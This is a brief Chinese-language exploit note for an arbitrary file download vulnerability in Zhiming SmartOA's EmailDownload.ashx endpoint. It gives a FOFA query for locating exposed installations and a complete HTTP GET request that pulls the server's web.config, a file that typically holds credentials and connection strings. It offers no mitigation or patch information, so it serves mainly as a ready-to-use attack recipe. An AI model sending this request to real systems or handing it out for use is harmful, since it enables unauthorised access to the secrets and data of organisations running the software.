智明SmartOA EmailDownload任意⽂件下载漏洞
一、漏洞简介
智明 SmartOA EmailDownload.ashx⽂件存在任意⽂件下载漏洞,通过漏洞可下载服务器上的敏感⽂
件,查看敏感信息。
二、影响版本
- 智明SmartOA
三、资产测绘
- fofa
app="智明协同-SmartOA" - 特征
四、漏洞复现
GET /file/EmailDownload.ashx?url=~/web.config&name=web.config HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close